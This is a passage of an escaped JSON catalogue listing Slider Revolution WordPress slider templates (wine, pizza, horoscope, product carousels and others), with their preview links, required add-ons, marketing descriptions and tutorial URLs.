AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-08-18 11:56:17\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Classy Product Slider for Your Shop\\u2019s Home Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-classy-product-slider-for-your-shop-s-home-page\\/\",\"guide_img\":\"tutorial\\/Food-Presentation-Template-Slider.png\",\"active\":\"1\",\"installed\":false},\"718\":{\"id\":\"761\",\"title\":\"FutureSight Digital Marketing Template\",\"alias\":\"FutureSight-Digital-Marketing-Template\",\"zip\":\"FutureSight-Digital-Marketing-Template.zip\",\"uid\":\"9bfd6be89aca94230967563d61b796b3\",\"img\":\"FutureSight-Digital-Marketing-Template\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/futuresight-digital-marketing-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=futuresight-digital-marketing-template\",\"version\":\"1.0.0\",\"required\":\"6.6.15\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Embrace the future with FutureSight - a template designed for visionary marketers. Its sleek design, combined with dynamic animations, offers a seamless user experience. Perfect for agencies aiming for the stars.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Revolution Base\",\"filter\":[\"carousel\",\"hero\",\"Special FX\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particlewave-addon\\\\\\/revslider-particlewave-addon.php\\\",\\\"name\\\":\\\"Particle Wave AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-08-23 10:38:17\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create an Eye-Catching Hero with Gradients and Particle Effects [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-an-eye-catching-hero-with-gradients-and-particle-effects\\/\",\"guide_img\":\"tutorial\\/FutureSight-Digital-Marketing-Template.png\",\"active\":\"1\",\"installed\":false},\"719\":{\"id\":\"762\",\"title\":\"Starry Night Parallax Zoom Effect Slider\",\"alias\":\"Starry-Night-Parallax-Zoom-Effect-Slider\",\"zip\":\"Starry-Night-Parallax-Zoom-Effect-Slider.zip\",\"uid\":\"dd0a9034a10397ba5b0b76fb8d7e203c\",\"img\":\"Starry-Night-Parallax-Zoom-Effect-Slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/starry-night-parallax-zoom-effect-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=starry-night-parallax-zoom-effect-slider\",\"version\":\"1.0.0\",\"required\":\"6.6.16\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">The \\\"Starry Night Parallax Zoom Effect Slider\\\" is a captivating template that transforms your website slider into a mesmerizing journey through a celestial dreamscape. With stunning parallax and zoom effects, it immerses your audience in a starry night sky, creating a visually stunning and engaging user experience that will leave a lasting impression. Perfect for showcasing your content or products with a touch of celestial magic.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-09-13 11:16:06\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create an Eye-catching Slider with a Parallax Zoom Effect [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-an-eye-catching-slider-with-a-parallax-zoom-effect\\/\",\"guide_img\":\"tutorial\\/Starry-Night-Parallax-Zoom-Effect-Slider.png\",\"active\":\"1\",\"installed\":false},\"720\":{\"id\":\"763\",\"title\":\"Beyond The Void Parallax Hero With Particles\",\"alias\":\"beyond-the-void\",\"zip\":\"beyond-the-void.zip\",\"uid\":\"c7f47a117b31c76d7f3ad52440abed86\",\"img\":\"beyond-the-void\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/beyond-the-void-parallax-hero-with-particles\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=beyond-the-void-parallax-hero-with-particles\",\"version\":\"1.0.0\",\"required\":\"6.6.16\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Journey beyond the stars with our latest template. An astronaut, after landing on a distant asteroid, unveils an alien anomaly. This parallax hero design, reminiscent of a cinematic sci-fi poster, promises a visual treat. \\\"Beyond the stars, he found the unknown. Now it is coming home.\\\" Experience the magic of the void.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"Special FX\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-thecluster-addon\\\\\\/revslider-thecluster-addon.php\\\",\\\"name\\\":\\\"Slider Revolution The Cluster AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-09-19 14:42:06\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Enhance Your Hero Image Design with Special Effects [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-enhance-your-hero-image-design-with-special-effects\\/\",\"guide_img\":\"tutorial\\/beyond-the-void.png\",\"active\":\"1\",\"installed\":false},\"721\":{\"id\":\"764\",\"title\":\"Extravaganza Ecommerce Product Carousel Static\",\"alias\":\"Static-Ecommerce-Product-Carousel\",\"zip\":\"Static-Ecommerce-Product-Carousel.zip\",\"uid\":\"6bb030f4419e247edfaf94478aa6578e\",\"img\":\"Static-Ecommerce-Product-Carousel\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/extravaganza-ecommerce-product-carousel\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=extravaganza-ecommerce-product-carousel\",\"version\":\"1.0.0\",\"required\":\"6.6.16\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Step up your online store with the Extravaganza Ecommerce Product Carousel. Crafted for the contemporary shop, it flaunts products in their full glory, enveloped in a dark, sleek aesthetic. There is a WooCommerce version and a static version available, which you can adapt to work with any WordPress website.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"carousel\"],\"plugin_require\":null,\"date\":\"2023-10-04 11:56:54\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Beautiful Product Carousel Design [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-beautiful-product-carousel-design-tutorial\\/\",\"guide_img\":\"tutorial\\/ecommerce-product-carousel.png\",\"active\":\"1\",\"installed\":false},\"722\":{\"id\":\"765\",\"title\":\"Extravaganza Ecommerce Product Carousel Woo\",\"alias\":\"woo-ecommerce-product-carousel\",\"zip\":\"woo-ecommerce-product-carousel.zip\",\"uid\":\"51b63bf649fdff61634fe888f51ddb4d\",\"img\":\"woo-ecommerce-product-carousel\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/extravaganza-ecommerce-product-carousel\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=extravaganza-ecommerce-product-carousel\",\"version\":\"1.0.0\",\"required\":\"6.6.16\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Step up your online store with the Extravaganza Ecommerce Product Carousel. Crafted for the contemporary shop, it flaunts products in their full glory, enveloped in a dark, sleek aesthetic. There is a WooCommerce version and a static version available, which you can adapt to work with any WordPress website.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"carousel\"],\"plugin_require\":null,\"date\":\"2023-10-04 12:00:08\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Beautiful Product Carousel Design [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-beautiful-product-carousel-design-tutorial\\/\",\"guide_img\":\"tutorial\\/ecommerce-product-carousel.png\",\"active\":\"1\",\"installed\":false},\"723\":{\"id\":\"766\",\"title\":\"Serenity Hero With Focus Effect\",\"alias\":\"Serenity-Hero-With-Focus-Effect\",\"zip\":\"Serenity-Hero-With-Focus-Effect.zip\",\"uid\":\"f0c6d9090236c20b1d7536aedc3d8cf8\",\"img\":\"Serenity-Hero-With-Focus-Effect\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/serenity-hero-with-focus-effect\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=serenity-hero-with-focus-effect\",\"version\":\"1.0.0\",\"required\":\"6.6.16\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Enhance your websites visual appeal with the \\\"Serenity Hero With Focus Effect\\\" Slider Revolution template. This mesmerizing slider seamlessly combines tranquil backgrounds with dynamic focus effects, guiding your audiences attention to vital elements of your content. Impress with engaging animations, ensure responsive design across all devices, and customize effortlessly to match your brands style. Create a captivating user experience that converts visitors into devoted followers with this exceptional slider.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-10-04 12:03:27\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Focus Effect to Draw Attention to Your Product Images [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-focus-effect-to-draw-attention-to-your-product-images\\/\",\"guide_img\":\"tutorial\\/Serenity-Hero-With-Focus-Effect.png\",\"active\":\"1\",\"installed\":false},\"724\":{\"id\":\"767\",\"title\":\"OakGrove Wine Slider Template\",\"alias\":\"OakGrove-Wine-Slider-Template\",\"zip\":\"OakGrove-Wine-Slider-Template.zip\",\"uid\":\"151ae1d2e6e7b84873f8b62ba57f829c\",\"img\":\"OakGrove-Wine-Slider-Template\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/oakgrove-wine-slider-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=oakgrove-wine-slider-template\",\"version\":\"1.0.0\",\"required\":\"6.6.18\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Unveil the allure of your wines with the \\\"OakGrove Wine Slider Template.\\\" Infused with rustic elegance and smooth transitions, this template offers a captivating journey through your vineyards legacy. Whether you are a boutique winery or an established vineyard, this slider is the ideal tool to showcase your finest vintages and unique tasting experiences.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-11-03 15:34:47\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Mysterious Splash Page for Your Website [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-mysterious-splash-page-for-your-website\\/\",\"guide_img\":\"tutorial\\/OakGrove-Wine-Slider-Template.png\",\"active\":\"1\",\"installed\":false},\"725\":{\"id\":\"768\",\"title\":\"Geometric Slider Design Template\",\"alias\":\"Geometric-Slider-Design-Template\",\"zip\":\"Geometric-Slider-Design-Template.zip\",\"uid\":\"f024549e5a43b79c185def088f00e42f\",\"img\":\"Geometric-Slider-Design-Template\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/geometric-slider-design-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=geometric-slider-design-template\",\"version\":\"1.0.0\",\"required\":\"6.6.18\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Immerse your audience in contemporary visual sophistication with our Geometric Slider Design Template. This dynamic slider combines sleek geometric patterns with a modern aesthetic, creating a captivating visual experience. With its seamless integration and customizable features, effortlessly elevate your websites allure and engage your visitors in a cutting-edge digital journey.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particlewave-addon\\\\\\/revslider-particlewave-addon.php\\\",\\\"name\\\":\\\"Particle Wave AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-11-14 10:25:27\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create an Eye-catching Geometric Design for Your Homepage [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-an-eye-catching-geometric-design-for-your-homepage\\/\",\"guide_img\":\"tutorial\\/Geometric-Slider-Design-Template.png\",\"active\":\"1\",\"installed\":false},\"726\":{\"id\":\"769\",\"title\":\"Chocolate Bar Product Presentation Template\",\"alias\":\"Chocolate-Bar-Product-Presentation-Template\",\"zip\":\"Chocolate-Bar-Product-Presentation-Template.zip\",\"uid\":\"dc30a3d883c8d16de25544e94640c982\",\"img\":\"Chocolate-Bar-Product-Presentation-Template\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/chocolate-bar-product-presentation-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=chocolate-bar-product-presentation-template\",\"version\":\"1.0.0\",\"required\":\"6.6.18\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Unwrap the \\\"Chocolate Bar Product Presentation Template\\\" \\u2013 a delectable, visually captivating showcase for your irresistible chocolate creations. Whether you are a chocolatier or a gourmet brand, this template is the key to presenting your products with a touch of sophistication.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-11-14 10:29:58\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Unique Product Presentation Slider for Your Site [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-unique-product-presentation-slider-for-your-site\\/\",\"guide_img\":\"tutorial\\/Chocolate-Bar-Product-Presentation-Template.png\",\"active\":\"1\",\"installed\":false},\"727\":{\"id\":\"770\",\"title\":\"Fluid Dynamics Effect Showcase\",\"alias\":\"Fluid-Dynamics-Effect-Showcase\",\"zip\":\"Fluid-Dynamics-Effect-Showcase.zip\",\"uid\":\"cdd9213edf970f1fe04ded427fb2ada8\",\"img\":\"Fluid-Dynamics-Effect-Showcase\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/fluid-dynamics-effect-showcase\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=fluid-dynamics-effect-showcase\",\"version\":\"1.0.0\",\"required\":\"6.6.18\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Introducing the Fluid Dynamics Effect Showcase - a mesmerizing journey through liquid\\/gas wonders. Delve into cyber flows, chromatic ripples, ethereal jungle spirits, and cosmic collisions. Crafted for those who appreciate the magic in every pixel.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\",\"Special FX\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-fluiddynamics-addon\\\\\\/revslider-fluiddynamics-addon.php\\\",\\\"name\\\":\\\"Fluid Dynamics AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-11-14 10:32:31\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"Add Some Magic to Your Hero Section with Liquid Animation Effects [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/add-some-magic-to-your-hero-section-with-liquid-animation-effects\\/\",\"guide_img\":\"tutorial\\/Fluid-Dynamics-Effect-Showcase.png\",\"active\":\"1\",\"installed\":false},\"728\":{\"id\":\"771\",\"title\":\"Spotlight Hero Header With Fluid Effect\",\"alias\":\"Spotlight-Hero-Header-With-Fluid-Effect\",\"zip\":\"Spotlight-Hero-Header-With-Fluid-Effect.zip\",\"uid\":\"c15c375d48a9368fcb61f6a732fb9b9b\",\"img\":\"Spotlight-Hero-Header-With-Fluid-Effect\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/spotlight-hero-header-with-fluid-effect\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=spotlight-hero-header-with-fluid-effect\",\"version\":\"1.0.0\",\"required\":\"6.6.20\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">The \\\"Spotlight Hero Header With Fluid Effect\\\" is a dynamic and visually engaging website header template, perfect for making a bold first impression. Ideal for creative agencies, product showcases, or promotional campaigns, it blends drama with functionality for a memorable user experience.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-revealer-addon\\\\\\/revslider-revealer-addon.php\\\",\\\"name\\\":\\\"Reveal AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-fluiddynamics-addon\\\\\\/revslider-fluiddynamics-addon.php\\\",\\\"name\\\":\\\"Fluid Dynamics AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-12-20 16:48:30\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create an Innovative Typography Hero Section [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-an-innovative-typography-hero-section\\/\",\"guide_img\":\"tutorial\\/Spotlight-Hero-Header-With-Fluid-Effect.png\",\"active\":\"1\",\"installed\":false},\"729\":{\"id\":\"772\",\"title\":\"Suits Product Showcase Slider Template\",\"alias\":\"Suits-Product-Showcase-Slider-Template\",\"zip\":\"Suits-Product-Showcase-Slider-Template.zip\",\"uid\":\"f15dcfc11bbadfd8973ea38627d3ede6\",\"img\":\"Suits-Product-Showcase-Slider-Template\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/suits-product-showcase-slider-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=suits-product-showcase-slider-template\",\"version\":\"1.0.0\",\"required\":\"6.6.20\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">The \\\"Suits Product Showcase Slider Template\\\" is a sleek and professional slider design tailored for highlighting high-end products, especially suits. It features clean, elegant lines with a minimalist layout, ensuring the products are the focal point. This template is perfect for fashion retailers or businesses looking to showcase their products with sophistication and style, offering an intuitive and engaging user experience.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-12-20 16:51:58\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create an Eye-Catching Slider for Your Ecommerce Home Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-an-eye-catching-slider-for-your-ecommerce-home-page\\/\",\"guide_img\":\"tutorial\\/Suits-Product-Showcase-Slider-Template.png\",\"active\":\"1\",\"installed\":false},\"730\":{\"id\":\"773\",\"title\":\"Beards Full Width Image Carousel Template\",\"alias\":\"Beards-Full-Width-Image-Carousel-Template\",\"zip\":\"Beards-Full-Width-Image-Carousel-Template.zip\",\"uid\":\"98de06abfddd962e725202ceac02a952\",\"img\":\"Beards-Full-Width-Image-Carousel-Template\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/beards-full-width-image-carousel-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=beards-full-width-image-carousel-template\",\"version\":\"1.0.0\",\"required\":\"6.6.20\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">The \\\"Beards Full Width Image Carousel Template\\\" is a modern and stylish carousel design, ideal for showcasing wide-ranging images, especially focusing on beard styles and grooming products. This template features a full-width layout, giving each image maximum screen space for a more immersive visual experience. Its sleek and user-friendly interface allows for smooth navigation through the carousel, making it perfect for barber shops, grooming blogs, or lifestyle brands that want to highlight their work or products in a visually appealing and easily accessible format.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"carousel\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-thecluster-addon\\\\\\/revslider-thecluster-addon.php\\\",\\\"name\\\":\\\"Slider Revolution The Cluster AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-12-20 16:54:46\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"Give Your Customers Different Choices with a Full-Width Image Carousel [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/give-your-customers-different-choices-with-a-full-width-image-carousel\\/\",\"guide_img\":\"tutorial\\/Beards-Full-Width-Image-Carousel-Template.png\",\"active\":\"1\",\"installed\":false},\"731\":{\"id\":\"774\",\"title\":\"Animated Type Hero Collection\",\"alias\":\"Animated-Type-Hero-Collection\",\"zip\":\"Animated-Type-Hero-Collection.zip\",\"uid\":\"b939ae94fc4bcc2cf2aad050dc14a2f9\",\"img\":\"Animated-Type-Hero-Collection\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/animated-type-hero-collection\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=animated-type-hero-collection\",\"version\":\"1.0.0\",\"required\":\"6.7.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Elevate your websites first impression with dynamic, animated typography. Perfect for impactful hero sections, these template is versatile, easily customizable, and designed to make your message stand out, ensuring a memorable visitor experience.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2024-04-05 14:32:10\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"732\":{\"id\":\"775\",\"title\":\"Horoscope Slider with Zodiac Showcase\",\"alias\":\"Horoscope-Slider-with-Zodiac-Showcase\",\"zip\":\"Horoscope-Slider-with-Zodiac-Showcase.zip\",\"uid\":\"e896ce65076384fc81834b389dd90385\",\"img\":\"Horoscope-Slider-with-Zodiac-Showcase\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/horoscope-slider-with-zodiac-showcase\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=horoscope-slider-with-zodiac-showcase\",\"version\":\"1.0.0\",\"required\":\"6.7.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">The \\\"Horoscope Slider with Zodiac Showcase\\\" is an engaging Slider Revolution template that brings the magic of astrology to your website. It offers a sleek, interactive experience with beautiful visuals of all twelve zodiac signs, providing users with insightful astrological information. Perfect for adding a celestial touch to any site, this template makes exploring the zodiac both informative and visually stunning.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-thecluster-addon\\\\\\/revslider-thecluster-addon.php\\\",\\\"name\\\":\\\"Slider Revolution The Cluster AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2024-04-05 14:35:39\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create an Employee Spotlight Presentation Using a Website Slider [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-an-employee-spotlight-presentation-using-a-website-slider\\/\",\"guide_img\":\"tutorial\\/Horoscope-Slider-with-Zodiac-Showcase.png\",\"active\":\"1\",\"installed\":false},\"733\":{\"id\":\"776\",\"title\":\"Urban Oven Pizza Slider Template\",\"alias\":\"Urban-Oven-Pizza-Slider-Template\",\"zip\":\"Urban-Oven-Pizza-Slider-Template.zip\",\"uid\":\"630e123eb690fcf2f9a8807f64e24855\",\"img\":\"Urban-Oven-Pizza-Slider-Template\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/urban-oven-pizza-slider-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=urban-oven-pizza-slider-template\",\"version\":\"1.0.0\",\"required\":\"6.7.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Elevate your pizzerias online presence with the \\\"Urban Oven Pizza Slider\\\", a modern and sleek website slider designed to showcase the irresistible appeal of freshly baked pizzas. This template captivates with vivid imagery and smooth transitions, highlighting your culinary creations and enticing food enthusiasts with every slide. Perfect for any food-oriented website looking to engage 